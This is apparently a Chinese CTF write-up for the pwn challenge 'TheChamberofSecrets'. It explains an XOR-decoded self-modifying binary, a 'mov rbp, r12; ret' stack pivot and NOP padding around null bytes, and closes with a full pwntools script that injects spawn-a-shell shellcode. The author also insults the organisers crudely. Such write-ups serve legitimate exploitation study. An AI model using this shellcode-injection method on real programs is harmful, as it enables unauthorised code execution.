逆天比赛没有 pwn 题,无敌了。

Aura 前一天问我来不来打,我一看 ctftime 权重有 13,感觉还行,就来打了。

结果一上号

👴:我 Pwn 题呢?

👴:垃圾比赛。

Aura:垃圾比赛。

后来从 Reverse 的分区里翻出来一道 Pwn 题,那就做一下吧。

TheChamberofSecrets

程序比较简单,给了一个可执行文件,没给 libc 之类的,这其实很逆天,后面会考。

ida 打开:

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  _BYTE v4[36]; // [rsp+0h] [rbp-30h] BYREF
  _BYTE v5[4]; // [rsp+24h] [rbp-Ch] BYREF
  size_t len; // [rsp+28h] [rbp-8h]

  printf("Say the Magic Word: ");
  __isoc99_scanf("%s", v5);
  len = getpagesize();
  if ( mprotect((-len & &func1), len, 7) == -1 || mprotect((-len & &func2), len, 7) == -1 )
  {
    perror("mprotect");
    return 1LL;
  }
  else
  {
    xor(&func1, xor, v5);
    if ( (func1)(v4) )
    {
      xor(&func2, xor, v4);
      (func2)();
    }
    else
    {
      puts("Door remains locked!");
    }
    return 0LL;
  }
}

unsigned __int64 __fastcall xor(char *a1, __int64 a2, const char *a3)
{
  char v3; // bl
  unsigned __int64 result; // rax
  unsigned __int64 i; // [rsp+30h] [rbp-20h]
  char *v7; // [rsp+38h] [rbp-18h]

  v7 = a1;
  for ( i = 0LL; ; ++i )
  {
    result = i;
    if ( i >= a2 - a1 )
      break;
    v3 = *v7;
    *v7++ = v3 ^ a3[i % strlen(a3)];
  }
  return result;
}

然后 func1 和 func2 是两个数组,程序逻辑大概是 %s 读入一段任意长的数据,前 4 字节会把从 func1xor (不包括 xor)的所有字节全部循环异或一遍,然后执行 func1,在用 func2rbp-0x30 处的数据循环异或,最后执行 func2

注意,我这里并没有说 v4 而是说 rbp-0x30 就是暗示可以通过调 rbp 的位置来做到把 func2 变成 shellcode getshell。

逆天的来了,题目并没有告诉这个程序的可执行版本,也就是说我一开始用我的宿主机(arch linux,glibc 3.41)跑这个题的时候,r12 寄存器上是 1,其他寄存器也没有保留任何栈地址,私以为这种和版本强相关的程序应该给个 libc 或者在题目描述里说一下,但是这个逆天比赛根本没提,所以我一开始死活打不出来。

👴:垃圾比赛

后来切到 ubuntu 2204,调试发现,r12 寄存器上有栈地址。

可以注意到,mov rbp, r12; ret 就是 4 字节,所以 payload 前 4 字节就放这个。

后面应该拼一些垃圾字符,一直填充到 r12 - 0x30,这样执行完 mov rbp, r12; ret 后,程序的 rbp - 0x30 处就是异或后的 shellcode 了。

注意一下 func2 也会被第一次 xor 时的 v5 异或,所以不能直接用 ida 里的,在 gdb 里 dump binary memery ./bin start_addr end_addr,然后 ida 打开提取,这里称之为 func2_v5

最后一个坑点是程序一开始使用 %s 读取数据的,这个会被 \x00 截断:


In [10]: for i in range(len(sc)):
...:     print(sc[i] ^ modified_data[i], end=", ")
...:
7, 190, 197, 79, 8, 19, 182, 76, 22, 80, 25, 0, 119, 254, 214, 251, 167, 84, 35, 159, 60, 57, 101, 35, 71, 224, 208, 150, 243, 26, 178, 219, 221, 136, 221, 82, 112, 236, 213, 141, 38, 158, 254, 124, 14, 39, 71, 108

直接用 shellcode 和 func2_v5 异或会出来一个 \x00,可以在 shellcode 前填充 \x90 把这个截断字符错开。

rom pwn import *
from sys import argv

proc = "./TheChamberofSecrets"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
io = remote("", ) if argv[1] == 'r' else process(proc)

if args.G:
    gdb.attach(io, "breakrva 0x161b")

# func1 的数据
ida_chars = [
    0x39, 0x7B, 0xBA, 0x91, 0x24, 0xB2, 0xDF, 0x24, 0x6E, 0x33,
    0x33, 0x3C, 0xE5, 0x8E, 0x8B, 0x89, 0x93, 0xCC, 0x7B, 0xF9,
    0x69, 0xDD, 0x3E, 0x74, 0x6C, 0x7B, 0xBA, 0xB3, 0xD4, 0x33,
    0x33, 0x74, 0x6C, 0xDB, 0x02, 0x8A, 0x93, 0xCC, 0x7B, 0xFF,
    0xE9, 0x8B, 0xCE, 0x8B, 0x93, 0x7B, 0xBA, 0xB2, 0x24, 0xBE,
    0x36, 0x82, 0x61, 0x33, 0x33, 0x3C, 0xE5, 0xF4, 0x8B, 0x74,
    0x6C, 0x33, 0x33, 0x9C, 0xFF, 0xCD, 0xCC, 0x8B, 0x24, 0xB8,
    0xB6, 0xCC, 0x91, 0xCC, 0xCC, 0x3C, 0xE5, 0xF4, 0xDB, 0x80,
    0x91, 0xCC, 0xCC, 0xFD, 0x29, 0xC3, 0xB0, 0x09, 0x9C, 0x24,
    0x47, 0x7E, 0xD4, 0x33, 0x33, 0x74, 0x6C, 0xDA, 0x8F, 0x75,
    0x6C, 0x33, 0x7B, 0xF9, 0xE9, 0xF3, 0xCE, 0x8B, 0x93, 0x7B,
    0xBE, 0x61, 0xBF, 0x3E, 0x33, 0x74, 0xD5, 0x71, 0x33, 0x74,
    0x6C, 0x7B, 0xBA, 0xB3, 0x24, 0xBA, 0xE5, 0x87, 0x24, 0x96,
    0x7B, 0xFD, 0x9E, 0x7B, 0xBA, 0x8C, 0x63, 0x85, 0x39, 0xFC,
    0x64, 0x8C, 0x33, 0x74, 0x6C, 0x33, 0xDB, 0x84, 0x91, 0xCC,
    0xCC, 0xFD, 0xAB, 0xDB, 0xFA, 0x89, 0x93, 0xCC, 0xB8, 0x31,
    0x9C, 0x7B, 0xAB, 0x3C, 0xAD, 0xD3, 0x31, 0x3C, 0xE5, 0xF4,
    0xDB, 0x9C, 0x91, 0xCC, 0xCC, 0x3C, 0xE5, 0x76, 0xDB, 0xB3,
    0x29, 0xCF, 0x33, 0x74, 0x6C, 0x33, 0xD8, 0x69, 0xE7, 0x76,
    0xCF, 0x3C, 0xF4, 0x7B, 0xBE, 0x60, 0xE9, 0x33, 0x33, 0x74,
    0x6C, 0x7B, 0xB8, 0x31, 0x84, 0x7B, 0x32, 0xB6, 0xE7, 0x76,
    0xCF, 0xFD, 0x6E, 0xB0, 0x76, 0x88, 0x6D, 0xB8, 0x76, 0x88,
    0x57, 0x76, 0xC3, 0x08, 0xB7, 0xB8, 0x76, 0x84, 0xEF, 0xDB,
    0x32, 0xFD, 0x29, 0xCB, 0xD8, 0x00, 0x84, 0x35, 0xCD, 0x8B,
    0x93, 0xB8, 0x66, 0x8C, 0xE1, 0x79, 0x32, 0xED, 0x9B, 0xCA,
    0xBA, 0x21, 0x88, 0xB8, 0x76, 0x8C, 0x24, 0xAB, 0x7B, 0xF9,
    0x78, 0xB6, 0x33, 0x74, 0x6C, 0x33, 0x7B, 0xFF, 0x29, 0xDB,
    0x7B, 0x75, 0xBC, 0xB8, 0x33, 0xFD, 0x29, 0xD3, 0xB8, 0x31,
    0x88, 0x7B, 0xAB, 0x3C, 0xE1, 0x27, 0xB6, 0x74, 0x6C, 0x33,
    0x33, 0x3C, 0xE7, 0x76, 0xDB, 0x3C, 0x6D, 0xE3, 0xB8, 0x21,
    0x94, 0x7B, 0x50, 0xA6, 0x24, 0xBE, 0x3F, 0xE1, 0x6C, 0x33,
    0x33, 0x74, 0x24, 0xB8, 0x66, 0x9C, 0x24, 0x32, 0xF9, 0xFF,
    0x6C, 0xBA, 0x31, 0xFF, 0x29, 0xD7, 0x7B, 0xEC, 0x24, 0xBE,
    0x27, 0xF1, 0x6C, 0x33, 0x33, 0x74, 0x24, 0xB8, 0x76, 0x9C,
    0x24, 0x32, 0xF1, 0xFF, 0x29, 0xD3, 0xBA, 0x76, 0xEF, 0x5E,
    0xCB, 0x75, 0xEF, 0x4E, 0xCB, 0x74, 0x13, 0xB5, 0xF4, 0x31,
    0x98, 0x33, 0x33, 0x74, 0x6C, 0xDA, 0xA0, 0x74, 0x6C, 0x33,
    0xB8, 0x31, 0x98, 0x7B, 0xAB, 0x3C, 0xE1, 0x27, 0xB6, 0x74,
    0x6C, 0x33, 0x33, 0x3C, 0xE7, 0x76, 0xDB, 0x3C, 0x6D, 0xE3,
    0xB8, 0x74, 0x24, 0x50, 0xE3, 0x3C, 0xE7, 0xB6, 0x8B, 0x89,
    0x93, 0xCC, 0x7B, 0x75, 0xBC, 0x3C, 0x85, 0x7C, 0xE7, 0x76,
    0xC7, 0x3C, 0xF4, 0x7B, 0xBE, 0x60, 0xE9, 0x33, 0x33, 0x74,
    0x6C, 0x7B, 0xB8, 0x31, 0x84, 0x7B, 0x32, 0xA4, 0xE7, 0x33,
    0xB8, 0x21, 0x98, 0x7B, 0x50, 0xA6, 0x24, 0xBE, 0x07, 0xE1,
    0x6C, 0x33, 0x33, 0x74, 0x24, 0xB8, 0x66, 0x9C, 0x24, 0x32,
    0xC1, 0xFF, 0x7E, 0x7B, 0x50, 0x86, 0x24, 0x50, 0xE3, 0x3C,
    0xE5, 0xE3, 0x7B, 0x75, 0xAC, 0x7B, 0x32, 0xA4, 0x24, 0xF2,
    0xD3, 0x77, 0x24, 0x1A, 0xE3, 0x3C, 0x6D, 0xDB, 0x7B, 0x75,
    0x9C, 0x7B, 0x1E, 0x34, 0x6E, 0x33, 0x33, 0x7B, 0xDA, 0x33,
    0x0B, 0xB5, 0x18, 0x20, 0x7B, 0xFF, 0x29, 0xDB, 0x7B, 0xFD,
    0xAB, 0xDB, 0x2E, 0x88, 0x93, 0xCC, 0x8B, 0x74, 0x6C, 0x33,
    0x33, 0x9F, 0x4D, 0xB0, 0x76, 0x80, 0x6D, 0xB8, 0x76, 0x80,
    0x57, 0x76, 0xC3, 0x7B, 0xE0, 0x52, 0xCC, 0x8B, 0x93, 0x7B,
    0xB8, 0x31, 0x84, 0x7B, 0xBA, 0xB3, 0x84, 0xC9, 0xC8, 0x8B,
    0x93, 0x8B, 0x32, 0x74, 0x6C, 0x33, 0xFA, 0xB7
]

# 第一次 xor 执行完后,func2 被修改后的数据
modified_data = [
    0x6D, 0xD6, 0x8D, 0xF7, 0x27, 0x71, 0xDF, 0x22, 0x39, 0x7F,
    0x36, 0x73, 0x27, 0xB6, 0x5F, 0x1C, 0xCF, 0x26, 0x4A, 0x9E,
    0x3D, 0xB8, 0x51, 0x07, 0x46, 0xE1, 0xD1, 0x97, 0xC2, 0xEC,
    0xE4, 0xB1, 0xD5, 0xD6, 0x95, 0x53, 0x96, 0xBA, 0x9D, 0x04,
    0xC0, 0xAF, 0x2C, 0x16, 0x35, 0x7F, 0x48, 0x69, 0x7F, 0xF5,
    0x1A, 0x5D, 0xCF, 0x72, 0xEC, 0xDD, 0xBD, 0x4E, 0xA3, 0xBA,
    0x16, 0xFB, 0xB8, 0x52, 0x8F, 0xBC, 0xC0, 0x07, 0xBA, 0x5E,
    0x57, 0x4E, 0x2D, 0xB7, 0x17, 0xF0, 0xAA, 0x41, 0x5E, 0x85,
    0x96, 0x0E, 0x53, 0x98, 0x2E, 0x0E, 0x05, 0xC1, 0xEA, 0xA8,
    0x85, 0x10, 0x91, 0x95, 0x04, 0x12, 0x27, 0x7B, 0xF4, 0xEA,
    0x71, 0xF2, 0x33, 0x56, 0xC1, 0x70, 0xA4, 0xAB, 0xB9, 0xA8,
    0x89, 0x56, 0xC0, 0xED, 0xD6, 0xC0, 0xAE, 0x33, 0xA3, 0xAF,
    0xD5, 0x57, 0xDB
]
# sc = [0x6a,0x68,0x48,0xb8,0x2f,0x62,0x69,0x6e,0x2f,0x2f,0x2f,0x73,0x50,0x48,0x89,0xe7,0x68,0x72,0x69,0x1,0x1,0x81,0x34,0x24,0x1,0x1,0x1,0x1,0x31,0xf6,0x56,0x6a,0x8,0x5e,0x48,0x1,0xe6,0x56,0x48,0x89,0xe6,0x31,0xd2,0x6a,0x3b,0x58,0xf,0x5]

sc = """
mov rbp, r12
ret
"""
sc = asm(sc)
key = b""
for i in range(len(sc)):
    key += bytes([ida_chars[i] ^ sc[i]])
key = key.ljust(0xf4, b"a")
sc = shellcraft.sh()
sc = asm(sc)
sc = sc.rjust(48 + 20, b"\x90")
for i in range(len(sc)):
    key += bytes([modified_data[i] ^ sc[i]])
io.sendline(key)

io.interactive()

傻逼出题人。

👴:垃圾比赛。